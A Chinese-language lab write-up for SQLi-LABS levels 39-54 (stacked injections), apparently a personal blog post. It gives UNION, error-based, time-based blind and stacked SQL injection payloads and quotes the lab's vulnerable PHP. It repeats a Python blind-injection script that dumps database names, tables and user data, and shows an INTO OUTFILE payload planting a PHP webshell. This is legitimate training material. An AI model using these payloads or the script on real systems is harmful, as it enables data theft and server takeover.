【靶场练习_sqli-labs】SQLi-LABS Page-3 (Stacked Injections)
Less-39:
?id=1 and 1 ,?id=1 and 1 : 回显不同,数字型
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
Less-40:
?id=1' and '0 , ?id=1' and '0 :回显不同 ,单引号闭合
?id=2' and '1 : 回显第一条数据,小括号闭合
?id=2') order by 3--+ ,?id=2') order by 4--+ :回显不同==》3列
?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
Less-41:
?id=2 and 1 :回显第二条的数据 ,无小括号
?id=1 and 0 ,?id=1 and 0 :数字型
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
Less-42:
这里要补一个知识点:堆叠注入
注入原理
平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。
使用条件
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。
SQL INSERT INTO 语法
INSERT INTO 语句可以有两种编写形式。
第一种形式无需指定要插入数据的列名,只需提供被插入的值即可:
INSERT INTO table_name
VALUES (value1,value2,value3,...);第二种形式需要指定列名及被插入的值:
INSERT INTO table_name (column1,column2,column3,...)
VALUES (value1,value2,value3,...);
NOTE1:这里的login_user有过滤,无法注入。
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
NOTE2:插入的id要写大一点,id无法覆盖。
Less-43:
login_user=1--+&login_password=admin'--+&mysubmit=Login : 单引号闭合
这里有两个注入点,两个都要试一遍,最后发现在login_password里出现了报错
根据报错看出有小括号闭合:
可以进行数据的插入:login_user=1--+&login_password=admin');insert into users values(23,'bbbbbb','123456')--+&mysubmit=Login
login_user=bbbbbb&login_password=123456&mysubmit=Login : 成功登陆
Less-44:
弱口令过了,原理就是,不断地构造,猜测。。。
where username="$login_user" : 1" or "1
where username=("$login_user") : 1") or ("1
where username='$login_user' : 1' or '1
where username=('$login_user') : 1') or ('1
where username= $login_user : 1 or 1
login_user=1' or '1&login_password=1' or '1&mysubmit=Login
这里一份其他做法,用的是sql语句,记录一下:
username:admin
password:aaa';create table hps like users#
create table like:
说明:复制表结构和索引(但不包括表内的具体内容)
用法:create table user2 like user1create table as:
说明:复制表结构和数据(但不包括索引)
用法:
create table user2 as select * from user1;
create table user2 as select * from user1 limit 0;
其中,limit 0表示只复制表结构,不复制数据。
原文链接:https://blog.csdn.net/stpeace/article/details/87857903
Less-45:
老配方直接暴力来 : login_user=1') or ('1&login_password=1') or ('1&mysubmit=Login
Less-46:
<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result)
{ while ($row = mysql_fetch_assoc($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['username']."</td>";
echo "<td>".$row['password']."</td>";
echo "</tr>";
echo "</font>";
}
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-46.jpg" /><br>';
echo "Lesson Concept and code Idea by <b>D4rk</b>";
}
?>
整理好后的源码
这里的sort=num,是指按照num列排序:
?sort=2 and 1--+,回显的是按照第一列排序的结果,证明后台为数字型,然后尝试各种注入,最后报错注入成功了:
?sort=(select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b)--+ :查库
?sort=(SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) :查数据,用上面哪种报错法无法查表,老是显示回显多于一列,即使用了limit也没用,这个时候就可以用name_const()这种类型。
?sort=extractvalue(0x0a,concat(0x0a,(select database()))) : 在我的环境里不知道为什么始终用不了函数报错,但是也是可以勉勉强强的查个数据库:
这里贴一位师傅的博客,他这题讲的很详细:https://www.cnblogs.com/-zhong/p/10968532.html
Less-47:
?sort=1' and '1,?sort=1' and '0 :回显不同,单引号闭合
?sort=2') and('1 :报错,无小括号
?sort=' and (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b)--+ : 查库
?sort=' and (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) --+ : 查表中数据
Less-48:
猜测结构:只有1 and 1有回显,证明为数字型【使用的时候记得该最后的1为0,这其实是8条语句,四种类型,每种两个对比着看】
1 and 1
1' and '1
1" and "1
1) and (1
1") and ("1
1') and ('1
<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result)
{ while ($row = mysql_fetch_assoc($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['username']."</td>";
echo "<td>".$row['password']."</td>";
echo "</tr>";
echo "</font>";
}
echo "</table>"; }
}
else
{
echo "Please input parameter as SORT with numeric value<br><br>< br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-47.jpg" /><br>';
echo "Lesson Concept and code Idea by <b>D4rk</b>";
}
?>a
源码整理后的
报错注入失败,无错误回显:
?sort=1 and if((length(database())=8),sleep(3),1) --+ :时间注入成功了,其中这里延时了45s(一共15条数据,每一条延时3s):
这里我的sleep(0.2),一共15条数据,就会延时3s,不然太爆破长了:
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-48/?sort=1 "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.2)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.2)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 43
# table_name(43, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#117
data_detail(117, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4@aaaaaaaaaaaaaaaaaa@bbbbbb
盲注脚本
Less-49:这一次的注入在两边用单引号包裹起来了
找资料的时候发现一篇很好的博客:《Mysql order by 注入总结》
<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result)
{
?>
<center>
<font color= "#00FF00" size="4"> <table border='1'>
<tr>
<th> ID </th>
<th> USERNAME </th>
<th> PASSWORD </th>
</tr>
</font>
</font>
<?php
while ($row = mysql_fetch_assoc($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['username']."</td>";
echo "<td>".$row['password']."</td>";
echo "</tr>";
echo "</font>";
}
echo "</table>"; }
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-47.jpg" /><br>';
echo "Lesson Concept and code by <b>D4rk</b>";
}
?>
页面源码整理后的
?sort=1' and if((length(database())=8),sleep(3),1) --+ : 判断时间注入 ,然后走48的脚本
这里要贴另一种方法:into outfile注入 +《那些强悍的PHP一句话后门》
SELECT INTO…OUTFILE语句把表数据导出到一个文本文件中,并用LOAD DATA …INFILE语句恢复数据。但是这种方法只能导出或导入数据的内容,不包括表的结构,如果表的结构文件损坏,则必须先恢复原来的表的结构。
SELECT INTO…OUTFILE语法:
select * from Table into outfile '/路径/文件名' fields terminated by ',' enclosed by '"' lines terminated by '\r\n'
(1)路径目录必须有读写权限777
(2)文件名必须唯一
(3)fields terminated by ','必须存在,否则打开的文件的列在同一的单元格中出现
(4)我验证的表结构为gbk的,否则出现乱码● fields子句:在FIELDS子句中有三个亚子句:TERMINATED BY、 [OPTIONALLY] ENCLOSED BY和ESCAPED BY。如果指定了FIELDS子句,则这三个亚子句中至少要指定一个。
(1)TERMINATED BY用来指定字段值之间的符号,例如,“TERMINATED BY ','” 指定了逗号作为两个字段值之间的标志。
(2)ENCLOSED BY子句用来指定包裹文件中字符值的符号,例如,“ENCLOSED BY ' " '”表示文件中字符值放在双引号之间,若加上关键字OPTIONALLY表示所有的值都放在双引号之间。
(3)ESCAPED BY子句用来指定转义字符,例如,“ESCAPED BY '*'”将“*”指定为转义字符,取代“\”,如空格将表示为“*N”。
● LINES子句:在LINES子句中使用TERMINATED BY指定一行结束的标志,如“LINES TERMINATED BY '?'”表示一行以“?”作为结束标志。
?sort=1' into outfile "./test.php" lines terminated by 0x3c3f706870206576615f7228245f504f53545b73625d293f3e --+
这里把一句话木马hex了 ===》 把生成的一串当成分割符===》?sort=1' into outfile "./test.php" lines terminated by <?php eva_r($_POST[sb])?> --+
直接访问http://192.168.43.116/sqli-labs-master/Less-49/../../../var/lib/mysql/test.php
菜刀连接成功:
Less-50:
?sort= 1' --+ : 有报错回显,可以考虑报错注入
?sort= (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) --+ : 貌似限制了回显长度
?sort= (SELECT * FROM (SELECT name_const((select email_id from emails limit 5,1),1),name_const((select email_id from emails limit 5,1),1)) a) --+ : 用limit分割一个一个查
Less-51:
可以继续时间注入:
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-51/?sort=1' "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.2)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.2)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 43
# table_name(43, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#117
data_detail(117, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4@aaaaaaaaaaaaaaaaaa@bbbbbb
脚本
查了一下源码,里面有这个函数 mysqli_multi_query($con1, $sql) 可以考虑堆叠注入:
<?php
include("../sql-connections/sqli-connect.php");
error_reporting(0);
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql="SELECT * FROM users ORDER BY '$id'";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{ ?>
<?php
/* store first result set */
if ($result = mysqli_store_result($con1))
{
while($row = mysqli_fetch_row($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>";
printf("%s", $row[0]);
echo "</td>";
echo "<td>";
printf("%s", $row[1]);
echo "</td>";
echo "<td>";
printf("%s", $row[2]);
echo "</td>";
echo "</tr>";
echo "</font>"; } }
echo "</table>";
} else
{
echo '<font color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-51.jpg" /><br>';
}
?>
?sort=-1' into outfile "./test51.php" lines terminated by 0x3c3f706870206576615f7228245f504f53545b73625d293f3e --+ :
然后就是老套路了:
Less-52:
加入',)," 都没回显 ,但是可以考虑时间盲注:
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-52/?sort=1 "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.2)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.2)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 43
# table_name(43, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#117
data_detail(117, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4@aaaaaaaaaaaaaaaaaa@bbbbbb
看了其他师傅的做法,他们用堆叠注入直接插入数据:
?sort=1;insert into users values(1234,'chrysanthemum','********')--+
中文的话好像回显有问题:
Less-54:
?sort=0 , 正常回显应是字符型
?sort=1' and sleep(1)--+ : 可以继续时间盲注
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-53/?sort=1' "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.5)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.5)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.5)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.5)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.5)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.5)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.5)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.5)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 29
# table_name(29, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#98
# data_detail(98, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupi……
也可以继续用堆叠注入:?sort=1' ;insert into users values(123,'laolao','456')--+
【靶场练习_sqli-labs】SQLi-LABS Page-3 (Stacked Injections)的更多相关文章
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- SQL注入系列:SQLi Labs
前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...
- SQLI LABS Challenges Part(54-65) WriteUp
终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...
- SQLI LABS Stacked Part(38-53) WriteUp
这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...
- SQLI LABS Advanced Part(23-37) WriteUp
继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...
- Sqli labs系列-less-5&6 报错注入法(下)
我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...
随机推荐
- Docker 官网文档翻译汇总
官方文档地址 Guide Docker 入门 Docker 入门教程 方向和设置 容器 服务 swarm 集群 stack 部署应用 概述 用 Docker 进行开发 在 Docker 上开发应用 应 ...
- 使用多线程开启OCR
需求:经过opencv 或者其他算法对一张图片里面的文字内容进行切割,获取到切割内容的坐标信息,再使用ocr进行识别.一张一张识别太慢了,我们可以开启多线程识别.代码如下 threads = [] f ...
- 记录XorDDos木马清理步骤
1.检查 查看定时任务文件发现有两个异常定时任务 [root@manage ~]# cat /etc/crontab # * * * * * user-name command to be execu ...
- 《剑指offer》面试题9 斐波那契数列 Java版
书中方法一:递归,这种方法效率不高,因为可能会有很多重复计算. public long calculate(int n){ if(n<=0){ return 0; } if(n == 1){ r ...
- LeetCode #807. Max Increase to Keep City Skyline 保持城市天际线
https://leetcode-cn.com/problems/max-increase-to-keep-city-skyline/ 执行用时 : 3 ms, 在Max Increase to Ke ...
- 洛谷 P1025 & [NOIP2001提高组] 数的划分(搜索剪枝)
题目链接 https://www.luogu.org/problemnew/show/P1025 解题思路 一道简单的dfs题,但是需要剪枝,否则会TLE. 我们用dfs(a,u,num)来表示上一个 ...
- python 实现加法
https://ac.nowcoder.com/acm/contest/338/G 链接:https://ac.nowcoder.com/acm/contest/338/G来源:牛客网 题目描述 Th ...
- Swift编程语言学习1.6——可选值
